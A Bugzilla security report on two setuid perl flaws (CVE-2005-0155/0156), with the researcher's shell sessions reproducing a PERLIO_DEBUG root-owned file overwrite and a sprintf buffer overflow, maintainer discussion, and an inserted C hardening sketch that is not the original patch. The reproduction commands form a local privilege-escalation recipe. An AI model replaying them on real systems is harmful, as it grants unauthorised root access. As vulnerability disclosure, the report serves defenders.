Bugzilla – Bug 65354
VUL-0: CVE-2005-0156: 2 setuid perl problems
Last modified: 2021-11-04 16:01:57 UTC
From: "KF (Lists)" <kf_lists@digitalmunition.com>
To: nick@ccl4.org, larry@wall.org, vendor-sec@lst.de
Subject: [vendor-sec] [Fwd: setuid perl security issues]

[-- Attachment #1: text/plain --]

Excuse the poorly written description... I wrote it at 3am last night. This was also sent to perlbug@perl.org

-KF

[-- Attachment #2: setuid perl security issues (message/rfc822) --]

From: "KF (Lists)" <kf_lists@digitalmunition.com>
To: perlbug@perl.org
Subject: setuid perl security issues

[-- Attachment #1: text/plain --]

[-- Attachment #2: setuid_perl.txt --]

PERLIO_DEBUG
    If set to the name of a file or device then certain operations of PerlIO sub-system will be logged to that file (opened as append). Typical uses are UNIX:

./perlio.c:

    void
    PerlIO_debug(const char *fmt, ...)
    {
        ...
        if (!dbg) {
            char *s = PerlEnv_getenv("PERLIO_DEBUG");
            if (s && *s)
                dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
            else
                dbg = -1;
        }

If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op. Else you can do the following either via sperl or via a setuid wrapper:

sperl:

kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x 1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw- 1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:

kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper /usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x 1 root root 2872 2003-11-20 15:28 /usr/sbin/mooix-pty-helper
-rwsr-xr-x 1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x 1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22, <CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw- 1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2
kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0
kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...

kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.

[-- Attachment #3: setuid_perl_overflow.txt --]

While looking at the source code to figure out the details of my PERLIO_DEBUG file overwrite bug I also found a buffer overflow...

in perlio.c:

    if (dbg > 0) {
        dTHX;
    #ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));

Set PERLIO_DEBUG to anything, make a perl script calling sperl and run it with the full path (after placing it in a long ass directory):

    #!/usr/bin/sperl5.8.4
    print a;

[command line running test.pl from a /tmp/AAAA... path several hundred characters long omitted]
Segmentation fault

stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory)
** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00]
open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3
** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c]
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
Steps to reproduce: see above.
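A defensive illustration of the two fixes the report above calls for, added here as an example; it is not the patch attached to this bug nor perl's own code. It assumes the 1024-byte prefix buffer quoted from perlio.c, and all function names are my own: refuse PERLIO_DEBUG whenever real and effective ids differ, show why "umask 001" turned the 0666 log into a world-writable root-owned file, and build the "file:line " prefix with a bounded write.

```c
/* Added hardening sketch for the two PerlIO_debug() problems reported above;
 * illustrative code, not the perl-5.8.6-bug33990.patch attached to this bug.
 * Assumes the 1024-byte prefix buffer quoted from perlio.c. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Problem 1: PERLIO_DEBUG names a file that the process will create and
 * append to with whatever privilege it runs under. Refuse it unless real
 * and effective ids match, so a set*id program (sperl or a setuid wrapper)
 * never creates a root-owned, umask-dependent file on its caller's behalf. */
int perlio_debug_allowed(uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    return uid == euid && gid == egid;
}

/* Same check on the calling process's own ids. */
int perlio_debug_allowed_self(void)
{
    return perlio_debug_allowed(getuid(), geteuid(), getgid(), getegid());
}

/* Why "umask 001" mattered: the log is opened with mode 0666, so the file
 * ends up world-writable whenever the umask does not clear the other-write
 * bit. Returns 1 if a 0666 create under this umask leaves o+w set. */
int debug_log_world_writable(mode_t umask_val)
{
    return ((0666 & ~umask_val) & 0002) != 0;
}

/* Problem 2: the "file:line " prefix was built with sprintf() into a fixed
 * 1024-byte stack buffer from the script path, so a path longer than the
 * buffer overflowed it (hence esi 0x41414141 in the report). snprintf()
 * bounds the write and the caller learns about truncation instead.
 * Returns the prefix length, or -1 if it did not fit (buf is then a
 * truncated, NUL-terminated prefix). */
int perlio_debug_prefix(char *buf, size_t buflen, const char *file, long line)
{
    int n;
    if (!file)
        file = "(none)";
    n = snprintf(buf, buflen, "%s:%ld ", file, line);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}
```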
It's unclear if these really exist. Issue is not public yet.
Yes, I already saw this on perlbug. Fortunately we don't ship a suid-root perl... Dunno if we should fix this for old distros...
In this case this issue can be considered public.
I would prefer it fixed for all distros. The user might always make perl setuid root.
move to suselinux (away from securityinternal)
CAN-2005-0155
master swampid: 279
Use CAN-2005-0155 for the privilege escalation in debug mode.
Use CAN-2005-0156 for the buffer overflow.
Created attachment 28090: perl-5.8.6-bug33990.patch
Patch from Mandrake for both issues.
Yeah yeah, of course I already had the patch.
And the buffer overflow is a non issue.
Created attachment 28127: ex_perl2.c
The "non issue" sample root exploit.
I could at least reproduce it segfaulting... so there is an issue.
No, it's not an issue. It's in the PERLIO_DEBUG which can be used to overwrite arbitrary files anyway, so the overflow doesn't make things worse...
packages submitted...
Created attachment 28387: ex_perl2.c
ex_perl2.c with bugs fixed...
updates released.
CVE-2005-0156: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:P/A:N)